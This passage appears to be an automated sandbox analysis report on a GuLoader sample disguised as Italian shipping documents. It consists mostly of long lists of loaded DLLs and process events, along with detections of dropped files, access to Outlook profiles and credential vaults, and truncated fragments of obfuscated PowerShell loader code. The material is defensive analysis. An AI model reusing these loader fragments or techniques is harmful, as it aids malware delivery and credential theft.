            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: coremessaging.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: wintypes.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: wintypes.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: wintypes.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Ze1Ueabtx5.imgStatic file information: File size 1310720 > 1048576
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2465970106.000000000760E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2469658743.000000000882C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2465970106.000000000760E000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000006.00000002.2470285181.0000000009291000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Carboxylase $Libyerne $Prisere), (Harminic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Xerotherm = [AppDomain]::CurrentDomain.GetAssemblies()$global:Ch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($efterkrigsaarene)), $hjernekiste).DefineDynamicModule($Sexsymboler, $false).DefineType($Chorale, $Trosbekendelserne, [System.Multicast
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeJump to dropped file
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile created: C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
